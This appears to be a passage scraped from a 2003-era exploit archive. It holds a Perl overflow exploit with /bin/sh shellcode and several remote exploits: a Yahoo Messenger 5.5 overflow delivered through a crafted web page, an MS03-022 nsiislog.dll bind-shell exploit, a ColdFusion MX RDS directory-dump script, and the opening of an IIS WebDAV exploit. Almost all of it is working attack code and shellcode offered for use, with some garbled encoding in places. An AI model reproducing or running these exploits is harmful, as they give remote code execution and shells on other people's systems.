# linux ix86 shellcode rip from phx.c by proton
$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x 7e\x04\x8d\x7e\x1b\x89\x7e\x08"
."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x 31\xc0\x88\x07\x89\x46\x0c\x88"
."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\x cd\x80\x31\xdb\x89\xd8\x40\xcd"
."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x 41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;
$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
."Accept: $envvar\n"
."Accept-Language: $envvar\n"
."Accept-Encoding: $envvar\n"
."User-Agent: Mozilla/4.0\n"
."Host: $host\n"
."Connection: Close\n\n";
&connect_to;
print "[x] Sending exploit code ..\n";
print "[x] ret: $strret\n";
print "[x] suf: $suffsize\n";
print "[x] length:",length($request),"\n";
print $conn "$request";
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
}
sub check_result {
if ($result =~ /hello/ && !($result =~ /text\/html/)){
print $result;
$success = 1;
} else {
print $result;
print " Failed ...\n";
$success = 0;
}
}
#########~~ end function ~~#########
&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
&exploit($rawret);
&check_result;
if ($success == 1){
exit;
}
sleep 1;
}
# [2003-06-10]
80 Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)
/*
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
* ^__________^
*
*
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h> /* These are the usual header files */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */
static int port =80;
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";
/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x 6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()
static int port;
void Usage(char *programName)
{
printf("\n\t\t---------------------------------------------------\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: [email protected]\n");
printf("\t\t---------------------------------------------------\n\n");
/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t---------------------------------------------------\n\n");
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
printf("\t\t---------------------------------------------------\n\n");
}
/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;
for (i=1; i< argc;i++) {
if (argv[i][0] == '/' || argv[i][0] == '-') {
switch (argv[i][1]) {
/* An argument -? means help is requested */
case '?':
Usage(argv[0]);
break;
case 'P':
port=atoi(argv[i+1]);break;
case 'H':
if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}
int main(int argc,char *argv[])
{
FILE *fptr;
unsigned char buffer[5000];
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */
char sd[MAXDATASIZE]; /* sd will store send text */
struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */
struct hostent *he; /* pointer for the host entry */
WSADATA wsdata;
WSAStartup(0x0101,&wsdata);
if (argc == 1) {
/* If no arguments we call the Usage routine and exit */
Usage(argv[0]);
return 1;
}
HandleOptions(argc,argv);
fprintf(stdout,"Creating index.html: ");
if ((fptr =fopen("index.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}
// memseting the buffers for preperation
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
// whe place the a jmp ebp+0x3 instuction inside the buffer
// to jump over the eip changing bytes at the en offset
//
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
// |____________^
buffer[offset-4]=0xeb;
buffer[offset-3]=0x03;
memcpy(buffer+offset,sraddress,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode) );
// here whe make the index.html
// whe open it again if some one connects to the exploiting server
// and send it over to the victim.
fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html>
</body>\x00\x00\x00",0x22,0x22);
fclose(fptr); // <-- closing index.html again
// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
memset(server.sin_zero,0,8); /* zero the rest of the structure*/
if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
/* calls bind() */
printf("bind() error\n");
exit(-1);
}
if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}
while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
/* calls accept() */
printf("accept() error\n");
exit(1);
}
if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==N ULL){
printf("gethostbyname() error\n");
exit(-1);
}
printf("You got a connection from %s (%s)\n",
inet_ntoa(client.sin_addr),he->h_name);
/* prints client's IP */
fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}
fprintf(stdout,"Sending the overflow string... ");
// reading the index.html file and sending its
// contents to the connected victim
while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';
}
send(fd2,sd,strlen(sd),0);
printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name);
gets(sd);
exit(0);
}
return 0;
}
// [2003-06-23]
80 MS Windows Media Services Remote Exploit (MS03-022)
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif
char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //A¤A«?¯ A®?¢A« A¤A?A¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x04\xa8\x93"
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
"\x53\x06\x04\x04\xab\x04\x6e\x37"
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
"\x66\x53\x06\x04\x04\xa8\xab\x13"
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
"\x04\x6e\x4b\x06\x04\x04\xc8\x20"
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
"\xf9\x04\x6e\x3b\x06\x04\x04\x72"
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
"\xfb\x76\x66\x9f\x05\x04\x04\x91"
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
"\x04\x6e\x47\x06\x04\x04\xf0\x3b"
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
"\x4e\xa7\x05\x04\x04\x04\x6e\x43"
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
"\x05\x04\x04\xab\x76\x7e\x9f\x05"
"\x04\x04\xab\x04\x4e\xa7\x05\x04"
"\x04\x04\x6e\x4f\x06\x04\x04\x72"
"\x7e\xa3\x05\x04\x04\x07\x76\x46"
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
"\x05\x04\x04\x72\x7e\xb3\x05\x04"
"\x04\x72\x7e\xbb\x05\x04\x04\x3c"
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
"\xfb\xc8\x20\x76\x7e\x03\x06\x04"
"\x04\xab\x76\x7e\xf3\x05\x04\x04"
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
"\xea\xf8\x7e\x53\x06\x04\x04\xab"
"\xa8\x04\x6e\x3f\x06\x04\x04\x04"
"\x4e\xa3\x05\x04\x04\x04\x6e\x57"
"\x06\x04\x04\x12\xa0\x04\x04\x04"
"\x04\x6e\x33\x06\x04\x04\x13\x76"
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
"\xfb\x10\x19\x72\x86\x0b\x72\x8e"
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
"\x70\x34\xd0\xb6\xf7\x70\xad\x83"
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
"\x78\x3f\xff\x10\xf1\xa2\x78\x38"
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
"\xfb\x70\x86\x0b\x12\x99\x04\x04"
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
"\x89\x9a\x89\x82\xba\xfb\xbe\x83"
"\x92\x8f\xab\x89\x94\x98\x9e\x88"
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
"\xab\x89\x94\x98\x9e\x88\x88\xba"
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
"\x99\x92\x95\x9f\xfb\x97\x92\x88"
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
"\x94\x88\x9e\x88\x94\x98\x90\x9e"
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7";
const DWORD default_EIP_pos = 9992; //A¯A®A«A®A¦A¥A*A¨A¥ EIP A¢ A??£?¤A¥? A¥ (sploit)
const DWORD default_EBX_points_to = 9988; //?£A? A§ ?¢A¥A«?¬ A¢ EBX A®?¢A*A®??A¨?¢A¥A«?¬A*A® sploit
//const DWORD default_EIP_value = 0x77F8441B; //A¯A® ?*?¢A®A¬?£ A¤? . A¤.A?. JMP EDX, A¢ A¤ A*A*A®A¬ ??A«?£?§ A¥ ?*?¢A® A¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //?*?¢A® A*A¥ A¯? A¨A£A®A¤A¨A«A®???¬
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];
void usage(char* argv[])
{
printf("Dicklamer (: "
"We are not responsible for the illegal use of this software.\n"
"Description: Binds shell to port 34816 (or higher if port busy).\n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
"Supported target(s):\n"
"Windows version\t\t\t\tnsiislog.dll version\n"
"------------------------------------------------------------\n"
"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
exit(0);
}
int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;
if (argc<2) usage(argv);
nArgIndex = 1;
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}
try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;
//A?A¯? A¥A¤A¥A«?¯A¥A¬ A¤? A¥?? ??A¥? A¢ A?
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {//A€A¤? A¥?? - A¨A¬?¯ ??A¥? A¢ A?
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {//A€A¤? A¥?? - IP
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};
addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);
char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*?£A?? ?¢?¬ \0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*?£A?? ?¢?¬ \0*/);
//A¯? A¨ A¯A¥? A¥?¥A®A¤A¥ A* EIP, EBX A??£A¤A¥?¢ ?£A? A§?«A¢ ?¢?¬ A* A¯A®??A«A¥A¤A*A¨A© DWORD A* ?¨A¥A£A® A§ A¯? A®?? , A£A¤A¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;
if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");
sprintf(sploitbuf,
"POST %s HTTP/1.0\r\n"
"Accept: */*\r\n"
"User-Agent: NSPlayer/4.1.0.3917\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %i\r\n"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
"\r\n%s\r\n",
nsiislog,strlen(sploit),sploit);
int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{
printf("%s\n",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %i\n",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
// [2003-07-01]
80 ColdFusion MX Remote Development Service Exploit
#!/usr/bin/perl
# RDS_c_Dump.pl
# By angry packet
##
# THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
#
# ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Due to certian current situations I am not allowed to release full exploit code with
# ( READ, RETRIEVE, WRITE ) functions.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1 :64:25773:0,02:F:7:default1:66:1187843:0,
# 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:20 4803:0,
# 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security 1:65:286723:0,
# 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67 :65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use IO::Socket;
use vars qw($response @clength @rarray);
## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
"Content-Length: 28",
"Content-Length: 47",
"Content-Length: 46",
#"Content-Length: 32",
#"Content-Length: 50",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 24",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 29",
"Content-Length: 46",
"Content-Length: 37"
);
@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:7:C:/_mm/STR:1:*STR:0:",
"3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
#"3:STR:10:C:/_notes/STR:1:*STR:0:",
#"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:3:C:/STR:1:*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++ ) {
for ( $c = 0; $c < @clength; $c++ ) {
if( $i == $c ) {
&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
}
}
}
sub gen_sock() {
my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
PeerPort => $PORT,
Proto => 'tcp',
);
die "Socket Could not be established ! $!" unless $sock;
print "Target: $TARGET:$PORT\n";
print "$POST\n";
print "Request String Value: $rarray[$i]\n";
print "$clength[$c]\n";
print "Please wait.. ..\n";
print $sock "$POST";
print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
print $sock "Host: $TARGET\r\n";
print $sock "$clength[$c]\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
print $sock "\r\n";
print $sock "$rarray[$i]";
# lets return and print data to term
while($response = <$sock>) {
chomp($response);
print "$response\n";
}
close($sock);
}
# [2003-07-07]
80 MS Windows WebDav III remote root Exploit (xwdav)
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright (c) 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
